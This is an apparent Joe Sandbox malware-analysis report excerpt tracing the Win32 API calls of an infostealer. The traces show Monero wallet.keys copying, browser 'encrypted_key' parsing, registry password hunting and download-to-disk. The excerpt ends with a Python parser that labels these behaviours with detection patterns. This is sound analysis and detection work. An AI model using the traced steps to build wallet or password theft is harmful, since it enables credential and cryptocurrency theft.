                    • Part of subcall function 00B06280: InternetOpenA.WININET(00B20DFE,00000001,00000000,00000000,00000000), ref: 00B062E1
                    • Part of subcall function 00B06280: StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06303
                    • Part of subcall function 00B06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06335
                    • Part of subcall function 00B06280: HttpOpenRequestA.WININET(00000000,GET,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B06385
                    • Part of subcall function 00B06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B063BF
                    • Part of subcall function 00B06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B063D1
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15318
                  • lstrlen.KERNEL32(00000000), ref: 00B1532F
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00B15364
                  • lstrlen.KERNEL32(00000000), ref: 00B15383
                  • lstrlen.KERNEL32(00000000), ref: 00B153AE
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 8ff83af3f92c61ee2b66e85e0baee734a60f29cc9361f37121531ce4a717a0a9
                  • Instruction ID: 29f432880e8927857f0760898773167f360855b3e072e71101a8c18c7190a94c
                  • Opcode Fuzzy Hash: 8ff83af3f92c61ee2b66e85e0baee734a60f29cc9361f37121531ce4a717a0a9
                  • Instruction Fuzzy Hash: F0510E30911148DBCB18FF64DD96AEE77B9EF50310F904498F40AAA591DF347B86CB62
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 4bf50a0f88daec25723ca18ebae2ba638f3b27ac2a632c816aaba4b87f995e6e
                  • Instruction ID: 72851ade2cde3ff01ea18189e1d33499d095d02f34d3887b88f2b75f44de38d0
                  • Opcode Fuzzy Hash: 4bf50a0f88daec25723ca18ebae2ba638f3b27ac2a632c816aaba4b87f995e6e
                  • Instruction Fuzzy Hash: F0C1B4B59412199BCB14EF60DC89FEA73B8BF54300F4045D8F50AA7281EA70AAC5CFA1
                  APIs
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B142EC
                  • lstrcat.KERNEL32(?,011FDC28), ref: 00B1430B
                  • lstrcat.KERNEL32(?,?), ref: 00B1431F
                  • lstrcat.KERNEL32(?,011FCBA0), ref: 00B14333
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B18D90: GetFileAttributesA.KERNEL32(00000000,?,00B01B54,?,?,00B2564C,?,?,00B20E1F), ref: 00B18D9F
                    • Part of subcall function 00B09CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B09D39
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                    • Part of subcall function 00B193C0: GlobalAlloc.KERNEL32(00000000,00B143DD,00B143DD), ref: 00B193D3
                  • StrStrA.SHLWAPI(?,011FDB50), ref: 00B143F3
                  • GlobalFree.KERNEL32(?), ref: 00B14512
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09AEF
                    • Part of subcall function 00B09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B04EEE,00000000,?), ref: 00B09B01
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09B2A
                    • Part of subcall function 00B09AC0: LocalFree.KERNEL32(?,?,?,?,00B04EEE,00000000,?), ref: 00B09B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00B144A3
                  • StrCmpCA.SHLWAPI(?,00B208D1), ref: 00B144C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B144D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00B144E5
                  • lstrcat.KERNEL32(00000000,00B20FB8), ref: 00B144F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: ef19f767c697911159780f826ca3cbb6d4f3069f39494762cee0f58bc56d283f
                  • Instruction ID: 0d0753805446abd2602faf6dc289a0454f32f4f411858b9581be740b6e1156fe
                  • Opcode Fuzzy Hash: ef19f767c697911159780f826ca3cbb6d4f3069f39494762cee0f58bc56d283f
                  • Instruction Fuzzy Hash: A47146B6910208ABDB14EFE4DC85FEE77B9BB58300F4045D8F605A7181EA34DB45CBA1
                  APIs
                    • Part of subcall function 00B012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B012B4
                    • Part of subcall function 00B012A0: RtlAllocateHeap.NTDLL(00000000), ref: 00B012BB
                    • Part of subcall function 00B012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B012D7
                    • Part of subcall function 00B012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B012F5
                    • Part of subcall function 00B012A0: RegCloseKey.ADVAPI32(?), ref: 00B012FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0134F
                  • lstrlen.KERNEL32(?), ref: 00B0135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00B01377
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B01465
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00B014EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 9f9a49e6e526b3c2e41ec26b6f8f8b011db426fb7ea3060999fd2960c8d4c48e
                  • Instruction ID: 3cb182d9eb898eee2b845940c2f966bd116c801351f374adcc7748a7a254a8a5
                  • Opcode Fuzzy Hash: 9f9a49e6e526b3c2e41ec26b6f8f8b011db426fb7ea3060999fd2960c8d4c48e
                  • Instruction Fuzzy Hash: A45103B1D5011957DB15FB60DD92AED73BCAF54310F8045D8B60AA2092EE306BCACBA6
                  APIs
                    • Part of subcall function 00B072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B0733A
                    • Part of subcall function 00B072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B073B1
                    • Part of subcall function 00B072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B0740D
                    • Part of subcall function 00B072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00B07452
                    • Part of subcall function 00B072D0: HeapFree.KERNEL32(00000000), ref: 00B07459
                  • lstrcat.KERNEL32(00000000,00B217FC), ref: 00B07606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B07648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00B0765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B0768F
                  • lstrcat.KERNEL32(00000000,00B21804), ref: 00B076A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B076D3
                  • lstrcat.KERNEL32(00000000,00B21808), ref: 00B076ED
                  • task.LIBCPMTD ref: 00B076FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: adc2377613e57356b40aeee0e109ee403ac712616f872708144aada427a538b5
                  • Instruction ID: 7a6a8c066fad21f07df55415f63512eeece005bb25da50f1e55553c984705936
                  • Opcode Fuzzy Hash: adc2377613e57356b40aeee0e109ee403ac712616f872708144aada427a538b5
                  • Instruction Fuzzy Hash: 1F314B79D40609DBCB04EFE8DC95DEE7BB8EB49301B144198E106A72A0DE34AA46DB61
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011FD8E0,00000000,?,00B20E2C,00000000,?,00000000), ref: 00B18130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B18137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B18158
                  • __aulldiv.LIBCMT ref: 00B18172
                  • __aulldiv.LIBCMT ref: 00B18180
                  • wsprintfA.USER32 ref: 00B181AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 2965fede34af23eefb1fd9f45a6c3937c81fbcc26a48e0c4143a05fbf55508e9
                  • Instruction ID: 67f9c55e80755e404e645dff08834cf071aa9c25bdbb692d403e5ef6eafd7655
                  • Opcode Fuzzy Hash: 2965fede34af23eefb1fd9f45a6c3937c81fbcc26a48e0c4143a05fbf55508e9
                  • Instruction Fuzzy Hash: 15211AB1E44318ABDB00DFD8DC49FAEB7B8FB48B10F504649F605BB280D77869018BA5
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                  • InternetOpenA.WININET(00B20DF7,00000001,00000000,00000000,00000000), ref: 00B0610F
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B0618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B061B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B061DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B0620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00B06249
                  • InternetCloseHandle.WININET(?), ref: 00B06253
                  • InternetCloseHandle.WININET(00000000), ref: 00B06260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: e66afc4a340ee9671ce61c045876a8265edd5c5a2bdced875eb5be912cbaf67f
                  • Instruction ID: 2de9723168e57e0760369a5ba899b56b754594dec8dbd53a255244238c7a2898
                  • Opcode Fuzzy Hash: e66afc4a340ee9671ce61c045876a8265edd5c5a2bdced875eb5be912cbaf67f
                  • Instruction Fuzzy Hash: E1513DB5940218ABDB20DF64DC49BEE7BF8FB44701F5080D8B605A72C1DB746A89CFA5
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B0733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B073B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B0740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B07452
                  • HeapFree.KERNEL32(00000000), ref: 00B07459
                  • task.LIBCPMTD ref: 00B07555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: 62625943d363ee6e31703ae6accde4d89468c54dbeceeff88ba32130975d4149
                  • Instruction ID: 279ca1c01bbac6eeb03b45b9ec91b6682104a8360980688e1191dfdb3785a79d
                  • Opcode Fuzzy Hash: 62625943d363ee6e31703ae6accde4d89468c54dbeceeff88ba32130975d4149
                  • Instruction Fuzzy Hash: 6661FCB5D441589BDB24DB50DC45BD9B7F8BF54300F0081E9E689A6281DF706BC9CFA1
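The two records above are the clearest behavioural units in this part of the report: the WinINet function at 00B0610F (InternetOpenA, InternetOpenUrlA, CreateFileA, InternetReadFile, WriteFile) writes a downloaded body to disk, and the function at 00B0733A (RegOpenKeyExA on 80000001, RegEnumValueA, StrStrA for "Password") walks an HKCU key looking for value names that contain "Password". The raw hexadecimal arguments hide what matters (80000001 is HKEY_CURRENT_USER, 00020019 is KEY_READ, 40000000 with 00000002 is GENERIC_WRITE plus CREATE_ALWAYS). The following is an added example, not code from Joe Sandbox, its IDA plugin or the Stealc sample: it parses the "• api.MODULE(args), ref: ADDR" and "• String ID: a$b$c" lines exactly as they appear in this report, decodes the flag-taking parameters with documented Win32 constants, and labels each record with the capability its call chain implies. The sample records embedded below are copied from the two function listings above; the capability names and the chain definitions are this example's own assumptions.

```python
"""Decode the API-call and String-ID lines of Joe Sandbox function records.

Added example; not Joe Sandbox, IDA plugin or Stealc code. It parses the line
format visible in this report and names the flag-taking arguments with their
documented Win32 constants. Capability labels and chains are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: bool  # listed as "Part of subcall function ..."


_CALL = re.compile(
    r"^\s*(?:•\s*)?(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[\w@?]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
_STRINGS = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<ids>.*)$")


def parse_call(line):
    """One "• api.MODULE(args), ref: ADDR" line -> Call, or None if it is not one."""
    m = _CALL.match(line)
    if not m:
        return None
    args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
    return Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None)


def parse_record(text):
    """Split one function record into its calls (report order) and its String IDs."""
    calls, strings = [], []
    for line in text.splitlines():
        call = parse_call(line)
        if call:
            calls.append(call)
            continue
        m = _STRINGS.match(line)
        if m:
            strings.extend(s for s in m["ids"].split("$") if s)
    return calls, strings


# Symbolic names keyed by (api, parameter index). dict = exact enum value,
# list = bit flags, most specific mask first. Only flag-taking positions are
# listed: the report prints raw stack values, so pointers, "?" and string
# arguments pass through unchanged.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_SAM = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE"),
           (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
INET_OPEN = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY"}
INET_FLAGS = [(0x80000000, "INTERNET_FLAG_RELOAD"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
              (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE")]
PARAM_TABLES = {
    ("RegOpenKeyExA", 0): HKEY, ("RegOpenKeyExA", 3): KEY_SAM,
    ("CreateFileA", 1): ACCESS, ("CreateFileA", 2): SHARE, ("CreateFileA", 4): DISPOSITION,
    ("InternetOpenA", 1): INET_OPEN, ("InternetOpenUrlA", 4): INET_FLAGS,
}


def decode_flags(value, table):
    names = []
    for mask, name in table:
        if (value & mask) == mask:
            names.append(name)
            value &= ~mask
    if value:
        names.append(f"0x{value:X}")  # bits no table entry explains
    return "|".join(names) or "0"


def decode_arg(call, index):
    raw = call.args[index]
    table = PARAM_TABLES.get((call.api, index))
    if table is None or not re.fullmatch(r"[0-9A-F]{8}", raw):
        return raw
    value = int(raw, 16)
    return table.get(value, raw) if isinstance(table, dict) else decode_flags(value, table)


def describe(call):
    return f"{call.api}({', '.join(decode_arg(call, i) for i in range(len(call.args)))})"


def has_chain(calls, apis):
    """True when `apis` occur in that order (not necessarily adjacent) among the calls."""
    it = iter(calls)
    return all(any(c.api == api for c in it) for api in apis)


def capabilities(calls, strings):
    """Behaviour labels (this example's own names) for one function record."""
    caps = set()
    if has_chain(calls, ["InternetOpenUrlA", "CreateFileA", "InternetReadFile", "WriteFile"]):
        caps.add("download_to_disk")
    if has_chain(calls, ["RegOpenKeyExA", "RegEnumValueA", "StrStrA"]) and any(
            "Password" in c.args for c in calls if c.api == "StrStrA"):
        caps.add("registry_password_hunt")
    if any(s.upper().startswith("SELECT") and "token_service" in s for s in strings):
        caps.add("chromium_token_service_query")
    if any(s.endswith("wallet.keys") for s in strings):
        caps.add("monero_wallet_path")
    return caps


# Sample input copied from the two function records in this report.
DOWNLOAD_RECORD = """\
• InternetOpenA.WININET(00B20DF7,00000001,00000000,00000000,00000000), ref: 00B0610F
• StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06147
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B0618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B061B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 00B061DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B0620A
• CloseHandle.KERNEL32(?,?,00000400), ref: 00B06249
"""
REGHUNT_RECORD = """\
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B0733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B073B1
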